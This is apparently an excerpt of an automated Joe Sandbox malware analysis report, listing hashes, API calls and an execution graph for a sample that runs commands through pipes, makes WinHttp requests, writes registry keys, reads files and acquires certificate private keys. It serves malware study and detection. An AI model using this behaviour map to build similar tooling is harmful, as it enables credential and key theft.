                                                                                                        • API String ID: 3757679902-0
                                                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                        • Instruction ID: 73bd893be36d1ce9137fff633f00bdfaa8406ee357451ded9a54f04e41984f8c
                                                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                        • Instruction Fuzzy Hash: 66F09036600721AFE7203BF9A88DB6F76ECBF49734F140929F642910C0DB78EC458A61

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0074EB35
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.2520233894.000000000073D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0073D000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_73d000_jfrhswe.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID:
                                                                                                        • API String ID: 4275171209-0
                                                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                        • Instruction ID: cc6543566534702e374c0188285a9f11e004eff51307f22052e6dc6ee33fc041
                                                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                        • Instruction Fuzzy Hash: 86112B79A00208EFDB01DF98C985E99BBF5EF08351F0580A4F9489B362D375EA50DF90

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:23.2%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:37.8%
                                                                                                        Total number of Nodes:862
                                                                                                        Total number of Limit Nodes:32
4002->3988 4003 7ff7327a1990 4 API calls 4002->4003 4004 7ff7327a9c0d 4003->4004 4005 7ff7327a97dc 16 API calls 4004->4005 4006 7ff7327a9c25 4005->4006 4006->3988 4007 7ff7327a1990 4 API calls 4006->4007 4008 7ff7327a9c38 4007->4008 4009 7ff7327a97dc 16 API calls 4008->4009 4010 7ff7327a9c50 4009->4010 4010->3988 4011 7ff7327a1990 4 API calls 4010->4011 4012 7ff7327a9c63 4011->4012 4013 7ff7327a97dc 16 API calls 4012->4013 4014 7ff7327a9c7b 4013->4014 4014->3988 4015 7ff7327a1990 4 API calls 4014->4015 4016 7ff7327a9c8e 4015->4016 4017 7ff7327a97dc 16 API calls 4016->4017 4018 7ff7327a9ca6 4017->4018 4018->3988 4019 7ff7327a1990 4 API calls 4018->4019 4020 7ff7327a9cb9 4019->4020 4021 7ff7327a97dc 16 API calls 4020->4021 4022 7ff7327a9cd1 4021->4022 4022->3988 4023 7ff7327a1990 4 API calls 4022->4023 4024 7ff7327a9ce4 4023->4024 4025 7ff7327a97dc 16 API calls 4024->4025 4026 7ff7327a9cfc 4025->4026 4026->3988 4027 7ff7327a1990 4 API calls 4026->4027 4028 7ff7327a9d0f 4027->4028 4029 7ff7327a97dc 16 API calls 4028->4029 4030 7ff7327a9d27 4029->4030 4030->3988 4031 7ff7327a1990 4 API calls 4030->4031 4032 7ff7327a9d3a 4031->4032 4033 7ff7327a97dc 16 API calls 4032->4033 4034 7ff7327a9d52 4033->4034 4034->3988 4035 7ff7327a1990 4 API calls 4034->4035 4036 7ff7327a9d65 4035->4036 4037 7ff7327a97dc 16 API calls 4036->4037 4038 7ff7327a9d7d 4037->4038 4038->3988 4039 7ff7327a1990 4 API calls 4038->4039 4040 7ff7327a9d90 4039->4040 4041 7ff7327a97dc 16 API calls 4040->4041 4042 7ff7327a9da8 4041->4042 4042->3988 4043 7ff7327a1990 4 API calls 4042->4043 4044 7ff7327a9dbb 4043->4044 4045 7ff7327a97dc 16 API calls 4044->4045 4046 7ff7327a9dd3 4045->4046 4046->3988 4047 7ff7327a1990 4 API calls 4046->4047 4048 7ff7327a9de6 4047->4048 4048->4048 4049 7ff7327a97dc 16 API calls 4048->4049 4050 7ff7327a9e4c 4049->4050 4050->3988 4051 7ff7327a1990 4 API calls 4050->4051 4052 7ff7327a9e5f 4051->4052 4052->4052 4053 7ff7327a97dc 16 API calls 4052->4053 4054 7ff7327a9eba 4053->4054 
4054->3988 4055 7ff7327a1990 4 API calls 4054->4055 4056 7ff7327a9ecd 4055->4056 4056->4056 4057 7ff7327a97dc 16 API calls 4056->4057 4058 7ff7327a9f2f 4057->4058 4058->3988 4059 7ff7327a1990 4 API calls 4058->4059 4060 7ff7327a9f42 4059->4060 4060->4060 4061 7ff7327a97dc 16 API calls 4060->4061 4062 7ff7327a9f99 4061->4062 4062->3988 4063 7ff7327a1990 4 API calls 4062->4063 4064 7ff7327a9fac 4063->4064 4064->4064 4065 7ff7327a97dc 16 API calls 4064->4065 4066 7ff7327aa002 4065->4066 4066->3988 4067 7ff7327a1990 4 API calls 4066->4067 4068 7ff7327aa015 4067->4068 4068->4068 4069 7ff7327a97dc 16 API calls 4068->4069 4070 7ff7327aa072 4069->4070 4070->3988 4071 7ff7327a1990 4 API calls 4070->4071 4072 7ff7327aa085 4071->4072 4072->4072 4073 7ff7327a97dc 16 API calls 4072->4073 4074 7ff7327aa0db 4073->4074 4074->3988 4075 7ff7327a1990 4 API calls 4074->4075 4076 7ff7327aa0ee 4075->4076 4076->4076 4077 7ff7327a97dc 16 API calls 4076->4077 4078 7ff7327aa14b 4077->4078 4078->3988 4079 7ff7327a1990 4 API calls 4078->4079 4080 7ff7327aa162 4079->4080 4080->4080 4081 7ff7327a97dc 16 API calls 4080->4081 4082 7ff7327aa1bb 4081->4082 4082->3988 4083 7ff7327a1990 4 API calls 4082->4083 4084 7ff7327aa1d2 4083->4084 4084->4084 4085 7ff7327a97dc 16 API calls 4084->4085 4086 7ff7327aa221 4085->4086 4086->3988 4087 7ff7327a1990 4 API calls 4086->4087 4088 7ff7327aa238 4087->4088 4088->4088 4089 7ff7327a97dc 16 API calls 4088->4089 4090 7ff7327aa289 4089->4090 4090->3988 4091 7ff7327a1990 4 API calls 4090->4091 4092 7ff7327aa2a0 4091->4092 4092->4092 4093 7ff7327a97dc 16 API calls 4092->4093 4094 7ff7327aa2e6 4093->4094 4094->3988 4095 7ff7327a1990 4 API calls 4094->4095 4096 7ff7327aa2fd 4095->4096 4096->4096 4097 7ff7327a97dc 16 API calls 4096->4097 4098 7ff7327aa34b 4097->4098 4098->3988 4099 7ff7327a1990 4 API calls 4098->4099 4100 7ff7327aa365 4099->4100 4100->4100 4101 7ff7327a97dc 16 API calls 4100->4101 4102 7ff7327aa3af 4101->4102 4102->3988 4103 7ff7327a1990 4 API calls 
4102->4103 4104 7ff7327aa3c2 4103->4104 4104->4104 4105 7ff7327a97dc 16 API calls 4104->4105 4106 7ff7327aa423 4105->4106 4106->3988 4107 7ff7327a1990 4 API calls 4106->4107 4108 7ff7327aa436 4107->4108 4108->4108 4109 7ff7327a97dc 16 API calls 4108->4109 4110 7ff7327aa485 4109->4110 4110->3988 4111 7ff7327a1990 4 API calls 4110->4111 4112 7ff7327aa494 4111->4112 4112->4112 4113 7ff7327a97dc 16 API calls 4112->4113 4114 7ff7327aa4da 4113->4114 4114->3988 4115 7ff7327aa4de 4114->4115 4206 7ff7327a9478 4115->4206 4222 7ff7327ae7cc 4117->4222 4120 7ff7327ae7cc 2 API calls 4121 7ff7327a9672 4120->4121 4121->3985 4226 7ff7327a2554 4122->4226 4125 7ff7327a90a3 CreatePipe 4127 7ff7327a90c1 4125->4127 4128 7ff7327a90e8 CreatePipe 4125->4128 4126 7ff7327a9069 4130 7ff7327a1990 4 API calls 4126->4130 4133 7ff7327a1990 4 API calls 4127->4133 4129 7ff7327a9106 4128->4129 4132 7ff7327a9130 4128->4132 4134 7ff7327a1990 4 API calls 4129->4134 4131 7ff7327a907d GetLastError 4130->4131 4137 7ff7327a908e 4131->4137 4228 7ff7327a7cfc 4132->4228 4135 7ff7327a90d5 GetLastError 4133->4135 4136 7ff7327a911a GetLastError 4134->4136 4135->4137 4136->4137 4235 7ff7327a1a70 4137->4235 4140 7ff7327a909c 4140->3988 4149 7ff7327a95a0 WaitForSingleObject 4140->4149 4141 7ff7327a917b CreateProcessW 4232 7ff7327a25b4 4141->4232 4143 7ff7327a91c7 4144 7ff7327a91f5 CloseHandle 4143->4144 4145 7ff7327a91cb 4143->4145 4144->4140 4146 7ff7327a1990 4 API calls 4145->4146 4147 7ff7327a91df GetLastError 4146->4147 4148 7ff7327a91f0 4147->4148 4148->4144 4151 7ff7327a95c3 4149->4151 4155 7ff7327a9600 4149->4155 4150 7ff7327a95d4 4152 7ff7327a95ee GetExitCodeProcess 4150->4152 4154 7ff7327a968c 6 API calls 4150->4154 4150->4155 4151->4150 4239 7ff7327a968c PeekNamedPipe 4151->4239 4152->4155 4156 7ff7327a95ea 4154->4156 4155->3992 4156->4152 4156->4155 4158 7ff7327a1990 4 API calls 4157->4158 4159 7ff7327a9813 4158->4159 4159->4159 4160 7ff7327a1990 4 API calls 4159->4160 4161 7ff7327a9877 4160->4161 4253 
7ff7327a79f0 4161->4253 4165 7ff7327a988d 4166 7ff7327a25b4 GetProcessHeap HeapFree 4165->4166 4167 7ff7327a9895 4166->4167 4168 7ff7327a1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4167->4168 4169 7ff7327a98a4 4168->4169 4170 7ff7327a9224 15 API calls 4169->4170 4171 7ff7327a98af 4170->4171 4172 7ff7327ae6dc GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4171->4172 4173 7ff7327a98cd 4172->4173 4174 7ff7327ae6dc GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4173->4174 4176 7ff7327a98ed 4174->4176 4175 7ff7327a99cf 4178 7ff7327a1a70 wvsprintfW GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4175->4178 4176->4175 4177 7ff7327a1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4176->4177 4179 7ff7327a993f 4177->4179 4180 7ff7327a99ef 4178->4180 4181 7ff7327a9950 4179->4181 4182 7ff7327a9943 4179->4182 4183 7ff7327a1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4180->4183 4184 7ff7327a79f0 GetProcessHeap HeapAlloc 4181->4184 4185 7ff7327a19e4 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4182->4185 4186 7ff7327a99fe 4183->4186 4187 7ff7327a9958 4184->4187 4188 7ff7327a994e 4185->4188 4186->3988 4186->3995 4189 7ff7327a19e4 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4187->4189 4191 7ff7327a1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4188->4191 4190 7ff7327a9966 4189->4190 4192 7ff7327a25b4 GetProcessHeap HeapFree 4190->4192 4193 7ff7327a997d 4191->4193 4192->4188 4194 7ff7327a1990 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4193->4194 4195 7ff7327a9991 4194->4195 4196 7ff7327a99a2 4195->4196 4197 7ff7327a9995 4195->4197 4198 7ff7327a79f0 GetProcessHeap HeapAlloc 4196->4198 4199 7ff7327a19e4 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4197->4199 4200 7ff7327a99aa 4198->4200 4201 7ff7327a99a0 4199->4201 4202 7ff7327a19e4 GetProcessHeap HeapAlloc GetProcessHeap RtlReAllocateHeap 4200->4202 4204 7ff7327a1990 GetProcessHeap 
HeapAlloc GetProcessHeap RtlReAllocateHeap 4201->4204 4203 7ff7327a99b8 4202->4203 4205 7ff7327a25b4 GetProcessHeap HeapFree 4203->4205 4204->4175 4205->4201 4268 7ff7327a971c 4206->4268 4209 7ff7327a94cf 4210 7ff7327a968c 6 API calls 4209->4210 4211 7ff7327a94fc WaitForSingleObject 4209->4211 4213 7ff7327a9540 4209->4213 4220 7ff7327a9534 TerminateProcess 4209->4220 4210->4209 4212 7ff7327a9512 GetSystemTimeAsFileTime 4211->4212 4214 7ff7327a954d 4211->4214 4212->4209 4213->3988 4214->4213 4215 7ff7327a9563 4214->4215 4216 7ff7327a968c 6 API calls 4214->4216 4215->4213 4217 7ff7327a957d GetExitCodeProcess 4215->4217 4218 7ff7327a968c 6 API calls 4215->4218 4216->4215 4217->4213 4219 7ff7327a958f CloseHandle 4217->4219 4221 7ff7327a9579 4218->4221 4219->4213 4220->4213 4221->4213 4221->4217 4225 7ff7327a25dc GetProcessHeap HeapAlloc 4222->4225 4224 7ff7327a965f 4224->4120 4227 7ff7327a2561 CreatePipe 4226->4227 4227->4125 4227->4126 4229 7ff7327a7d0e 4228->4229 4238 7ff7327a25dc GetProcessHeap HeapAlloc 4229->4238 4231 7ff7327a7d1d 4231->4141 4233 7ff7327a25da 4232->4233 4234 7ff7327a25b9 GetProcessHeap HeapFree 4232->4234 4233->4143 4234->4233 4236 7ff7327a1918 4 API calls 4235->4236 4237 7ff7327a1a96 wvsprintfW 4236->4237 4237->4140 4240 7ff7327a96c2 4239->4240 4241 7ff7327a96ca 4239->4241 4240->4241 4246 7ff7327ae6dc 4240->4246 4241->4150 4244 7ff7327a9701 4250 7ff7327ae72c 4244->4250 4247 7ff7327ae6f9 4246->4247 4248 7ff7327a96dc ReadFile 4246->4248 4247->4247 4249 7ff7327a2654 4 API calls 4247->4249 4248->4241 4248->4244 4249->4248 4251 7ff7327ae6dc 4 API calls 4250->4251 4252 7ff7327ae741 4251->4252 4252->4241 4254 7ff7327a7a0d 4253->4254 4256 7ff7327a7a09 4253->4256 4262 7ff7327a25dc GetProcessHeap HeapAlloc 4254->4262 4257 7ff7327a19e4 4256->4257 4263 7ff7327a7dc8 4257->4263 4264 7ff7327a7de9 4263->4264 4267 7ff7327a25dc GetProcessHeap HeapAlloc 4264->4267 4269 7ff7327a974b 4268->4269 4271 7ff7327a94ba GetSystemTimeAsFileTime 4269->4271 4272 7ff7327a97a4 
WriteFile 4269->4272 4271->4209 4273 7ff7327a97c7 4272->4273 4273->4269 5001 7ff7327aec08 5002 7ff7327aec1f 5001->5002 5004 7ff7327aec33 5001->5004 5007 7ff7327a25dc GetProcessHeap HeapAlloc 5002->5007 5023 7ff7327a250c 5028 7ff7327a213c 5023->5028 5026 7ff7327a253b 5071 7ff7327a1c80 5028->5071 5031 7ff7327a25b4 2 API calls 5032 7ff7327a219e 5031->5032 5033 7ff7327a24e6 5032->5033 5034 7ff7327a21ba WinHttpCrackUrl 5032->5034 5033->5026 5060 7ff7327a1eec 5033->5060 5035 7ff7327a21e6 5034->5035 5036 7ff7327a24dd WinHttpCloseHandle 5034->5036 5037 7ff7327a21f7 WinHttpConnect 5035->5037 5036->5033 5037->5036 5038 7ff7327a2225 5037->5038 5038->5038 5039 7ff7327a228b WinHttpOpenRequest 5038->5039 5040 7ff7327a22ba 5039->5040 5041 7ff7327a24cd WinHttpCloseHandle 5039->5041 5042 7ff7327a22c0 WinHttpQueryOption WinHttpSetOption 5040->5042 5043 7ff7327a2304 WinHttpSendRequest 5040->5043 5041->5036 5042->5043 5044 7ff7327a24c4 WinHttpCloseHandle 5043->5044 5045 7ff7327a232b WinHttpReceiveResponse 5043->5045 5044->5041 5045->5044 5046 7ff7327a233e 5045->5046 5047 7ff7327ae7cc 2 API calls 5046->5047 5048 7ff7327a234d WinHttpQueryDataAvailable 5047->5048 5049 7ff7327ae6dc 4 API calls 5048->5049 5050 7ff7327a236d WinHttpReadData 5049->5050 5051 7ff7327a238b 5050->5051 5051->5048 5052 7ff7327ae72c 4 API calls 5051->5052 5054 7ff7327a239f 5051->5054 5052->5051 5053 7ff7327a24ba 5053->5044 5054->5053 5075 7ff7327a7a60 5054->5075 5099 7ff7327a1de8 5060->5099 5063 7ff7327a2121 5063->5026 5064 7ff7327a1f5e SysAllocString SafeArrayCreateVector SafeArrayAccessData 5065 7ff7327a262c 5064->5065 5066 7ff7327a1fa8 SafeArrayUnaccessData 5065->5066 5069 7ff7327a1fd9 5066->5069 5067 7ff7327a1ffe SysFreeString 5067->5063 5069->5067 5070 7ff7327a1cbc 11 API calls 5069->5070 5070->5067 5072 7ff7327a1ca1 5071->5072 5073 7ff7327a1ca5 WinHttpOpen 5072->5073 5074 7ff7327a79f0 2 API calls 5072->5074 5073->5031 5074->5073 5076 7ff7327a24a5 5075->5076 5077 7ff7327a7a84 5075->5077 5079 7ff7327a1cbc 
5076->5079 5087 7ff7327a25dc GetProcessHeap HeapAlloc 5077->5087 5088 7ff7327aa520 5079->5088 5089 7ff7327aa551 5088->5089 5098 7ff7327a25dc GetProcessHeap HeapAlloc 5089->5098 5105 7ff7327a1b74 5099->5105 5101 7ff7327a1e06 RegCreateKeyExA 5102 7ff7327a1e3f CoInitializeEx VariantInit CoCreateInstance 5101->5102 5103 7ff7327a1e46 5101->5103 5102->5063 5102->5064 5103->5103 5104 7ff7327a1ea2 RegSetValueExA RegCloseKey 5103->5104 5104->5102 5106 7ff7327a1bc3 5105->5106 5106->5101 5107 7ff7327adc0c 5108 7ff7327adc60 5107->5108 5109 7ff7327a1990 4 API calls 5108->5109 5110 7ff7327adc96 5109->5110 5111 7ff7327a1990 4 API calls 5110->5111 5112 7ff7327adcad 5111->5112 5235 7ff7327acbf4 RegOpenKeyExW 5112->5235 5114 7ff7327adccd 5115 7ff7327a1990 4 API calls 5114->5115 5116 7ff7327add30 5115->5116 5117 7ff7327a1990 4 API calls 5116->5117 5118 7ff7327add47 5117->5118 5119 7ff7327accf8 6 API calls 5118->5119 5120 7ff7327add6c 5119->5120 5121 7ff7327adeb3 5120->5121 5123 7ff7327add80 PathCombineW PathFileExistsW 5120->5123 5122 7ff7327a1990 4 API calls 5121->5122 5124 7ff7327adec2 5122->5124 5125 7ff7327adda6 PathQuoteSpacesW 5123->5125 5126 7ff7327adea0 5123->5126 5130 7ff7327a1990 4 API calls 5124->5130 5241 7ff7327acff0 5125->5241 5127 7ff7327a25b4 2 API calls 5126->5127 5127->5121 5129 7ff7327addbc lstrcatW 5243 7ff7327ae8a4 5129->5243 5132 7ff7327aded9 5130->5132 5133 7ff7327acbf4 4 API calls 5132->5133 5135 7ff7327adef2 5133->5135 5137 7ff7327a1990 4 API calls 5135->5137 5136 7ff7327a9644 2 API calls 5138 7ff7327adde6 5136->5138 5139 7ff7327adf0e 5137->5139 5138->5138 5141 7ff7327a900c 16 API calls 5138->5141 5140 7ff7327a1990 4 API calls 5139->5140 5142 7ff7327adf1d 5140->5142 5143 7ff7327ade3b 5141->5143 5145 7ff7327a1990 4 API calls 5142->5145 5144 7ff7327a95a0 8 API calls 5143->5144 5148 7ff7327ade81 5143->5148 5146 7ff7327ade50 5144->5146 5147 7ff7327adf34 5145->5147 5149 7ff7327ade77 5146->5149 5150 7ff7327a97dc 16 API calls 5146->5150 5151 7ff7327adf40 
GetEnvironmentVariableW 5147->5151 5153 7ff7327a25b4 2 API calls 5148->5153 5152 7ff7327a9478 13 API calls 5149->5152 5154 7ff7327ade64 5150->5154 5155 7ff7327adf69 5151->5155 5156 7ff7327ae1e7 5151->5156 5152->5148 5153->5126 5154->5149 5160 7ff7327a1990 4 API calls 5154->5160 5158 7ff7327adf75 PathAppendW PathFileExistsW 5155->5158 5157 7ff7327a1990 4 API calls 5156->5157 5159 7ff7327ae1f6 5157->5159 5158->5156 5161 7ff7327adf9a CreateFileW 5158->5161 5164 7ff7327a1990 4 API calls 5159->5164 5160->5149 5161->5156 5162 7ff7327adfcf GetFileSize 5161->5162 5250 7ff7327a25dc GetProcessHeap HeapAlloc 5162->5250 5166 7ff7327ae20d 5164->5166 5169 7ff7327acbf4 4 API calls 5166->5169 5171 7ff7327ae22a 5169->5171 5173 7ff7327a1990 4 API calls 5171->5173 5175 7ff7327ae246 5173->5175 5178 7ff7327a1990 4 API calls 5175->5178 5180 7ff7327ae25d 5178->5180 5184 7ff7327ae269 GetEnvironmentVariableW 5180->5184 5185 7ff7327ae37c 5184->5185 5186 7ff7327ae28c 5184->5186 5188 7ff7327a1990 4 API calls 5185->5188 5191 7ff7327ae298 PathAppendW PathFileExistsW 5186->5191 5192 7ff7327ae38b 5188->5192 5191->5185 5194 7ff7327ae2bd CreateFileW 5191->5194 5196 7ff7327a1990 4 API calls 5192->5196 5194->5185 5199 7ff7327ae2f2 GetFileSize 5194->5199 5201 7ff7327ae39a 5196->5201 5251 7ff7327a2588 GetProcessHeap HeapAlloc 5199->5251 5236 7ff7327accd7 5235->5236 5237 7ff7327acc47 RegEnumKeyExW 5235->5237 5236->5114 5238 7ff7327acc7d RegEnumKeyExW 5237->5238 5239 7ff7327acccc RegCloseKey 5237->5239 5238->5239 5239->5236 5242 7ff7327ad04b 5241->5242 5242->5129 5244 7ff7327ae7cc 2 API calls 5243->5244 5245 7ff7327ae8c3 5244->5245 5252 7ff7327ae750 5245->5252 5248 7ff7327ae6dc 4 API calls 5249 7ff7327addd9 5248->5249 5249->5136 5253 7ff7327ae797 5252->5253 5254 7ff7327ae76b 5252->5254 5253->5248 5254->5253 5255 7ff7327ae6dc 4 API calls 5254->5255 5255->5254

Control-flow Graph
APIs
• GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7327A924D
  • Part of subcall function 00007FF7327A25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF7327A1985,?,?,?,00007FF7327A155F), ref: 00007FF7327A25E5
  • Part of subcall function 00007FF7327A25B4: GetProcessHeap.KERNEL32 ref: 00007FF7327A25C1
  • Part of subcall function 00007FF7327A25B4: HeapFree.KERNEL32 ref: 00007FF7327A25CF
• WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7327A93AB
• GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7327A93C0
• TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7327A93EF
  • Part of subcall function 00007FF7327A968C: PeekNamedPipe.KERNELBASE ref: 00007FF7327A96B8
• WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7327A9421
• GetExitCodeProcess.KERNELBASE ref: 00007FF7327A9460
Strings
Memory Dump Source
• Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
• Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
Similarity
• API ID: ProcessTime$Heap$FileObjectSingleSystemWait$CodeExitFreeNamedPeekPipeTerminate
• String ID: & echo
• API String ID: 2711250446-3491486023
• Opcode ID: 0e5a6491b23a52f077622e03fa1d9963b355e200ccccf575446c2c7b3acaf6c1
• Instruction ID: 315f2f2320e971343fb49f87d1d33a5df2faf8225b1037a4b9c90700cdcfafa8
• Opcode Fuzzy Hash: 0e5a6491b23a52f077622e03fa1d9963b355e200ccccf575446c2c7b3acaf6c1
• Instruction Fuzzy Hash: 0D515325B09642E1EEA0EB16E5542BAE361FF8AB90FC44031CB4E47B95DEBCF455D320

Control-flow Graph

APIs
Memory Dump Source
• Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
• Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
Similarity
• API ID: Initialize$CreateInstanceSecurity
• String ID:
• API String ID: 89549506-0
• Opcode ID: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
• Instruction ID: 2f13cdb1168a959019622b053d0c5ce6ac21af0f7ca7c3abf4fd9f1c065ccc8b
• Opcode Fuzzy Hash: b06b60c75a0e364457e69cf4407a40afd88aa559a7b63d120074e74016c78773
• Instruction Fuzzy Hash: 7C118C73A14640DAF710DF61E8593AE7774F348B0DF608218EB491A958CF7CD245CB94

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !sEs$&s(s$>;!&
                                                                                                        • API String ID: 0-4287716972
                                                                                                        • Opcode ID: 955dc88760089e02dcc542af92e6f6587c9a500c94dba93d8da6369fc093ed2c
                                                                                                        • Instruction ID: a6dcb46a197986af7581451b26c81586076afb7ffdc7d843a1af0c1133d936c5
                                                                                                        • Opcode Fuzzy Hash: 955dc88760089e02dcc542af92e6f6587c9a500c94dba93d8da6369fc093ed2c
                                                                                                        • Instruction Fuzzy Hash: DB52C491B053C2A9EB50EFB194052FDA7627B1A7D8F845035DF4A2BB8BDE7CA104D360

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • GetProcessHeap.KERNEL32(?,?,?,00007FF7327A1951,?,?,00000000,00007FF7327A19BA), ref: 00007FF7327A2669
                                                                                                        • RtlReAllocateHeap.NTDLL(?,?,?,00007FF7327A1951,?,?,00000000,00007FF7327A19BA), ref: 00007FF7327A267A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.4176871660.00007FF7327A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7327A0000, based on PE: true
                                                                                                        • Associated: 0000000A.00000002.4176808164.00007FF7327A0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176947542.00007FF7327B1000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4176988341.00007FF7327B4000.00000004.00000001.01000000.00000008.sdmp
                                                                                                        • Associated: 0000000A.00000002.4177025957.00007FF7327B5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_7ff7327a0000_9245.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 1357844191-0
                                                                                                        • Opcode ID: 1be63deb12e22185627b2ef812326b1288c4791bb80671bf174c6fa45bf883bb
                                                                                                        • Instruction ID: 22ec9bee11965282d22c9040282cc51eaac0bf8953dcfdbc605c8a224791a0fc
                                                                                                        • Opcode Fuzzy Hash: 1be63deb12e22185627b2ef812326b1288c4791bb80671bf174c6fa45bf883bb
                                                                                                        • Instruction Fuzzy Hash: A6E08615A09586A1E948E796B9600759125BF5EFD1F888030EF0E07B55CD6CE851D610

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • CertEnumCertificatesInStore.CRYPT32 ref: 00007FF7327A2D90
                                                                                                        • CertGetNameStringW.CRYPT32 ref: 00007FF7327A2DD3
                                                                                                        • CertNameToStrW.CRYPT32 ref: 00007FF7327A2EB8
                                                                                                        • CertNameToStrW.CRYPT32 ref: 00007FF7327A2F0A
                                                                                                        • FileTimeToSystemTime.KERNEL32 ref: 00007FF7327A2F4B
                                                                                                        • FileTimeToSystemTime.KERNEL32 ref: 00007FF7327A2FC1
                                                                                                          • Part of subcall function 00007FF7327A1A70: wvsprintfW.USER32 ref: 00007FF7327A1AA9
                                                                                                          • Part of subcall function 00007FF7327A25B4: GetProcessHeap.KERNEL32 ref: 00007FF7327A25C1
                                                                                                          • Part of subcall function 00007FF7327A25B4: HeapFree.KERNEL32 ref: 00007FF7327A25CF
                                                                                                        • CertEnumCertificatesInStore.CRYPT32 ref: 00007FF7327A3178
                                                                                                          • Part of subcall function 00007FF7327A3220: CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A325E
                                                                                                          • Part of subcall function 00007FF7327A3220: CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF7327A328D
                                                                                                          • Part of subcall function 00007FF7327A3220: CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7327A2C48), ref: 00007FF7327A32BB
